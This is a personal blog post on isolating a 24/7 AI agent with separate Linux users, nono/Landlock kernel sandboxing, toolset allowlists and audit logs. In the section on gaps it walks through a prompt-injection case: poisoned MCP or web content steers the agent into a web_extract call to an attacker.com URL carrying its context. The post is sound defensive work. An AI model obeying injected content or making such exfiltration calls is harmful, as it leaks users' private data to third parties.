Skip to main content
NJannasch.Dev

Sandboxing AI Agents: Kernel-Level Isolation with nono and Landlock

· 11 min read
AISecurityAgentsHomelab

TL;DR: My Hermes Agent runs 24/7 with terminal access, file operations, and MCP calls. I use three layers of defense: OS user isolation between profiles, nono kernel sandboxing (Landlock) for cron scripts, and Hermes toolset allowlists. The sandbox covers subprocess-based tools but not in-process ones. and prompt injection remains unsolved. Least privilege beats detection.

How an Agent Run Actually Works

Before talking about security, it helps to understand what happens when an agent executes. Whether triggered by a person, a cron schedule, or an API call. the lifecycle is the same:

TRIGGERS Telegram user message Signal user message Cron scheduled job API / Webhook external call LLM Reasoning Loop read context → think → call tool → read result → think → repeat runs until done, error, or timeout CONTEXT Memory + Skills persistent, injected MCP Data RSS, APIs (read) Pre-run Script Output sandboxed data fetch ACTIONS (tool calls) SUBPROCESS Terminal Code Execution Browser nono sandboxable IN-PROCESS Web Search Web Extract File Read/Write no sandbox coverage MCP (in-process) Data queries API actions Webhooks depends on server DELIVERY Telegram msg Signal msg Memory write Green = kernel-sandboxable via nono. Red = runs in-process, no sandbox coverage. MCP tools provide context and proxy actions. the LLM decides what to call based on what it sees. terminates on: completion · error · timeout · max iterations

The agent runs a loop: read context, reason, call a tool, read the result, repeat. It terminates when it decides it is done, hits an error, or reaches a timeout. During that loop, it can call any tool its toolset allows. and those tools fall into two categories:

  • Subprocess tools (terminal, code execution, browser) spawn child processes. These can be kernel-sandboxed. the child inherits the restrictions, no escape possible.
  • In-process tools (web search, file operations, MCP calls) execute inside the gateway’s Python process. No subprocess means no sandbox boundary. The LLM can make outbound HTTP requests or write files directly.

MCP sits in between. The tools themselves are just a standardized interface. whether they read data or execute actions depends entirely on what the MCP server exposes. A read-only data endpoint is harmless context. An MCP server that exposes sendEmail or deleteRepo is an action proxy that the LLM can call based on whatever is in its context window. including potentially poisoned data from a previous tool call.

This is why the sandbox story has layers, not a single wall.

Layer 1: OS User Isolation

Each Hermes Agent profile runs as a separate Linux user. The default profile (hermes) handles Telegram and cron jobs. The personal profile (hermes-personal) handles Signal. They have separate home directories, separate Python venvs, separate data.

Linux file permissions mean one profile physically cannot read the other’s memories, sessions, or config. regardless of what the LLM tries. This covers every tool, every code path, every library. No framework-level check needed.

# hermes-personal trying to read the default profile:
cat /home/hermes/.hermes/config.yaml
# → Permission denied

# hermes trying to read the personal profile:
cat /home/hermes-personal/.hermes/memories/
# → Permission denied

This is the simplest and most robust layer. Fifty years of Unix permission model, battle-tested.

Layer 2: Kernel Sandbox with nono

I was recently pointed towards nono, a capability-based sandboxing library that enforces restrictions at the kernel level via Landlock. I wanted to see how far I could take it with Hermes.

Within each profile, cron scripts now run inside a nono sandbox via nono-py. The sandbox restricts filesystem access to only the directories the script needs and enforces a network host allowlist via a filtering proxy. My cron script can reach its configured API endpoint and an RSS feed. nothing else.

OS USER: hermes OS USER: hermes-personal nono KERNEL SANDBOX HERMES TOOLSET Cron Scripts Terminal Commands File Operations enabled_toolsets: ["cronjob"] Network: MCP + blog RSS only Filesystem: ~/.hermes/ scoped Audit: every request logged Telegram MCP nono KERNEL SANDBOX HERMES TOOLSET Terminal Commands File Operations Memory separate venv + data Network: Signal daemon + LLM only Filesystem: own profile only Cannot read default profile Signal OS user isolation Kernel sandbox (nono/Landlock) Framework toolset filter

The sandbox is irrevocable and inherited by all child processes. no escape via subprocess, ctypes, or spawning a binary. Configuration is two-tiered: global defaults in config.yaml, per-job overrides in jobs.json.

# config.yaml. global sandbox defaults
cron:
  sandbox:
    enabled: true
    defaults:
      filesystem:
        allow_read: ["~/.hermes/scripts/"]
        allow_write: []
      network:
        allow_hosts: []
// jobs.json. per-job override
{
  "sandbox": {
    "enabled": true,
    "network": {
      "allow_hosts": ["api.example.com", "feeds.example.com"]
    }
  }
}

Layer 3: Toolset Allowlists

The enabled_toolsets field on each cron job controls which tools the LLM sees. My monitoring job only gets ["cronjob"]. no terminal, no browser, no MCP. The LLM cannot call tools it does not know exist. This is the weakest layer (framework-level, not kernel-level), but it reduces the attack surface for the reasoning loop.

Audit Trail

Every sandboxed script execution logs its network activity to cron/audit.jsonl. I can ask the agent to review its own audit logs on demand:

Review the sandbox audit logs and tell me if anything looks unusual.

The agent runs a review script, sees every host its cron scripts contacted, and flags anomalies. The agent watching itself. with tamper-evident logs it cannot retroactively edit.

## Sandbox Audit Summary
Runs: 16 total, 0 failed
Network events: 112

Hosts contacted:
- api.example.com: 96x
- feeds.example.com: 16x

Anything not on that list would be a red flag worth investigating.

What This Does Not Cover

Being honest about the gaps: nono sandboxes subprocesses. terminal commands, pre-run scripts, anything that goes through subprocess.Popen. But agent frameworks also have native tools that run in-process: web search, page extraction, file operations, memory writes. These execute inside the gateway’s Python process, not as child processes, so they bypass the kernel sandbox entirely.

The risk is indirect. MCP tools themselves just provide context. they return data for the LLM to evaluate. But that data becomes part of the context window, and based on it the LLM decides which tools to call next. A poisoned MCP response or a webpage with hidden prompt injection could steer the LLM into calling web_extract("https://attacker.com/steal?data=<context>"). exfiltrating whatever is in its context window via a URL parameter. The web tool makes outbound HTTP requests to any host from within the process. No subprocess sandbox can catch that.

My mitigation: convert web-fetching cron jobs to the pre-run script pattern. Instead of letting the LLM browse a page directly, a bash script fetches the content via curl inside a nono sandbox (network-restricted to one host), strips the HTML, and feeds sanitized plain text to the agent. The LLM never sees raw HTML, so the injection surface shrinks dramatically. And even if the script itself were compromised, the sandbox prevents it from reaching anything beyond the allowed host.

Prompt Injection Is Unsolved. Focus on Intent

I spent some time looking into prompt injection defenses before realizing I was solving the wrong problem. An injection payload does not need to be in English. it can be in a language you don’t read, encoded in Unicode tricks, hidden in invisible characters. Filtering for “bad prompts” is not a game you win.

What clicked for me is that this is just the old least-privilege principle applied to a new runtime. Instead of asking “is this request malicious?” ask “does this process need this capability at all?” A cron job fetching an RSS feed has no business with terminal access. A script talking to one API endpoint has no business with unrestricted network. A profile for private conversations has no business reading another profile’s memory. Tighten the permissions enough and a successful injection has nowhere to go.

Next Step: Minimal Containers

An even stricter approach: run each agent profile in a minimal container. Not an Ubuntu-with-everything image. a purpose-built container with only the binaries the agent actually needs. No gcc, no ssh, no package manager. If the agent only runs Python scripts and curl, ship only Python and curl. The container’s filesystem becomes the allowlist. Combined with nono inside the container, you get kernel sandboxing within an already minimal surface. I have not done this yet, but it is the logical next step.

Summary

LayerWhat it coversEnforcement
OS user isolationProfile-to-profile data leakageKernel (file permissions)
nono/Landlock sandboxCron scripts, terminal commandsKernel (Landlock LSM)
Network proxyOutbound host filtering for scriptsnono proxy (HTTP_PROXY)
Toolset allowlistWhich tools the LLM can callFramework (Hermes config)
Audit trailWhat sandboxed scripts actually didAppend-only JSONL log

The remaining gap is in-process tools, and knowing where your sandbox ends is half the security model.

The Hermes Agent integration with nono is experimental. I maintain a fork with the sandbox patches (cron script sandboxing, terminal tool isolation, profile-scoped filesystem, audit logging, network proxy). It is not upstreamed and may break with Hermes updates.

One thing I keep noticing while working on this: the details matter (this is security, after all), but systems thinking and architecture knowledge matter more. Understanding how a Linux user model works, how Landlock fits into the kernel security stack, how MCP bridges context and actions, how subprocess isolation differs from in-process execution. none of this is specific to AI agents. It is operating systems, networking, and application security applied to a new domain. For the intrinsically motivated, the rabbit hole goes deep and every layer teaches something worth knowing.

The views and opinions expressed here are my own and do not reflect those of my employer.